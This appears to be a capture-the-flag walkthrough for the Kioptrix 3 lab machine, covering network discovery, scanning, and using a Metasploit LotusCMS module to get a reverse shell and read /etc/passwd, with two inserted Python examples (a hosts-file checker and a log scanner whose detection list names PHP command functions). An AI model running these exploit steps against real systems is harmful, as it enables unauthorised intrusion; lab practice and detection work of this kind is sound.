After setting up your environment, run the Kioptrix vuln-vm and your attack machine on the same LAN. This guide and write-up will mostly use Kali Linux as the attack machine. Once the Kioptrix vuln-vm is stood up, you’ll see this on the prompt:
As the motd says, edit the “hosts” file on your attack machine so that it points at the address of the vulnerable VM. Since we don’t know the IP address of the machine yet, we’ll have to do some network discovery first before we can do this.
First, run “netdiscover” on the network that the Kioptrix VM is running on. You’ll see some discoveries for devices on the subnet, one of which is Kioptrix. See screenshot:
192.168.144.5 is the host we’re looking for, so add the line “192.168.144.5 kioptrix3.com” to your /etc/hosts file, as the motd states.
Also run a ping for “kioptrix3.com” and ensure that your attack machine resolves the domain to your vulnerable machine, see here:
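Before pointing any tool at kioptrix3.com it is worth confirming that the hosts entry really maps the name to 192.168.144.5, because the resolver takes the first matching line and a stale duplicate higher in the file wins silently. The following is an added example, not code from the original write-up: a small parser for the hosts-file format with a check that the first entry for a name is the address you expect. The SAMPLE_HOSTS content is constructed to mirror the entry added above.

```python
"""
Verify that a hostname in /etc/hosts maps to the IP you expect before
pointing tools at it. Added example, not part of the original write-up;
the hosts content below is constructed to mirror the entry added above.
"""
from __future__ import annotations

# Constructed sample of what the attack machine's /etc/hosts might contain
# after the entry from the write-up is appended.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback
# lab targets
192.168.144.5   kioptrix3.com    # added per the Kioptrix motd
"""


def parse_hosts(text: str) -> dict[str, list[str]]:
    """Map each hostname/alias to the list of addresses that carry it.

    Handles comment lines, trailing comments, blank lines and multiple
    aliases per line, the way the resolver's files backend reads them.
    Addresses are kept in file order so the caller can see which wins.
    """
    mapping: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # an address with no names cannot resolve anything
        addr, names = fields[0], fields[1:]
        for name in names:
            mapping.setdefault(name.lower(), []).append(addr)
    return mapping


def resolves_to(text: str, hostname: str, expected_ip: str) -> bool:
    """True only if the FIRST hosts entry for hostname is expected_ip.

    The resolver uses the first matching line, so an older entry for the
    same name earlier in the file would send traffic somewhere else.
    """
    addrs = parse_hosts(text).get(hostname.lower(), [])
    return bool(addrs) and addrs[0] == expected_ip


if __name__ == "__main__":
    ok = resolves_to(SAMPLE_HOSTS, "kioptrix3.com", "192.168.144.5")
    print("kioptrix3.com ->", parse_hosts(SAMPLE_HOSTS).get("kioptrix3.com"), "OK" if ok else "MISMATCH")
```

To check the real file, read /etc/hosts into a string and pass it to resolves_to; the ping in the write-up then confirms the kernel resolver agrees with what the parser found.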
You can also run a port scan against 192.168.144.5, which will yield results:
As you can see in the screenshot, there are two open ports on the vuln-vm: 80 and 22. This is great information; we now have something to work with.
Port 80 indicates that this host is likely running a web server. You can verify this by opening your browser and going to kioptrix3.com.
We can work with this…next up, let’s get back into our bash shell and run a nikto scan on the target machine. See screenshot:
There are lots of good nuggets of information here to work with, namely that phpMyAdmin is running on the target, and that the web server is Apache.
Browsing through the website, we also see that the login page is powered by LotusCMS.
So we have three avenues we can attempt to leverage to attack, and hopefully exploit, the host:
- phpMyAdmin
- Apache
- LotusCMS
Let’s dig into what vulnerabilities / exploits are available for LotusCMS first.
You can search exploit-db for “lotuscms” and come up with the following:
Looks like there are two exploits available for Lotus CMS.
Alternatively, you can search the exploit-db database with the Kali tool “searchsploit”:
We will use the first exploit, and mirror (copy) it to our local directory with the command: searchsploit -m 18565.rb.
We can also use msfconsole to see if this exploit already exists in the Metasploit framework. Run the msfconsole command on your Kali machine, then run search lotuscms to see the exploits available.
So as you can see, we have a number of exploits available…in exploit-db, as well as a module available in Metasploit.
Type use exploit/multi/http/lcms_php_exec at your msfconsole prompt to load the module into Metasploit. Then type set and you’ll get a list of options that need to be set before running the exploit. See screenshot below:
To see the required parameters, run show options:
There are 3 parameters that must be set before running the exploit:
- RHOST
- RPORT
- URI
These will be set as follows:
- RHOST => kioptrix3.com
- RPORT => 80
- URI => /index.php?system=Admin
set RHOST kioptrix3.com
set RPORT 80
set URI /index.php?system=Admin
In case you’re wondering, the URI parameter was derived from the LotusCMS login page in the earlier screenshot.
If applicable, set your LHOST to an IP of the attack machine that the target host can route back to, otherwise you will not get a shell back.
Type exploit (or run) to launch your LotusCMS exploit against the target machine.
And here you go:
Ran a few commands here, and we have our shell and a directory listing.
Run cat /etc/passwd and you’ll get the passwd file from the target.
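Seen from the web server’s side, the attack above is a handful of HTTP requests to the LotusCMS admin URI that was set as the URI option, and those requests leave a trace in the Apache access log. The following is an added example, not code from the original write-up: a detection pass over Apache “combined” log lines that flags requests to /index.php?system=Admin whose query parameters carry PHP code fragments. The log lines, the marker list, the timestamps and the payload-shaped value in the third line are all constructed for illustration; the marker list is a heuristic chosen here, not something taken from LotusCMS or Metasploit.

```python
"""
Detection-side view of the LotusCMS attack in the write-up: scan Apache
combined access-log lines for requests to the admin URI that carry PHP
code fragments in their query string. Added example, not part of the
original write-up; the log lines and marker list below are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" log format; assumed here, as the write-up shows no logs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Fragments that have no business in a CMS routing parameter. Heuristic,
# chosen for this example; tune it against your own traffic before relying on it.
CODE_MARKERS = ("${", "eval(", "system(", "passthru(", "shell_exec(",
                "base64_decode(", "');", '");')

# The URI the write-up set in Metasploit: /index.php?system=Admin
ADMIN_PATH = "/index.php"
ADMIN_PARAM = ("system", "Admin")


def suspicious_params(target: str) -> list:
    """Return the query parameter names whose decoded value contains a code marker.

    Only requests to the LotusCMS admin page are inspected; any other
    path, or a request without system=Admin, yields an empty list.
    """
    parts = urlsplit(target)
    if parts.path != ADMIN_PATH:
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)
    if ADMIN_PARAM not in params:
        return []
    hits = []
    for name, value in params:
        decoded = unquote_plus(value).lower()  # handle double-encoded values too
        if any(marker in decoded for marker in CODE_MARKERS):
            hits.append(name)
    return hits


def scan_log(lines):
    """Yield (client_ip, timestamp, flagged parameter names) for each hit."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = suspicious_params(m["target"])
        if hits:
            yield m["ip"], m["ts"], hits


# Constructed sample: a benign front-page visit, a normal admin-page load,
# and a request whose "page" value decodes to ${phpinfo()} (a code-shaped
# string made up for this example, not a working payload).
SAMPLE_LOG = [
    '192.168.144.10 - - [10/Jan/2024:10:00:01 -0500] "GET / HTTP/1.1" 200 1543 "-" "Mozilla/5.0"',
    '192.168.144.10 - - [10/Jan/2024:10:00:05 -0500] "GET /index.php?system=Admin HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '192.168.144.10 - - [10/Jan/2024:10:00:09 -0500] "GET /index.php?system=Admin&page=%24%7Bphpinfo%28%29%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, ts, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} code fragment in parameter(s): {', '.join(hits)}")
```

Feeding the real access log through scan_log would surface the module’s requests by source address and time; a reverse shell started from the web server process (the “shell back” the write-up mentions) is the matching host-side signal, an outbound connection from the Apache user to the LHOST address.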
So what just happened?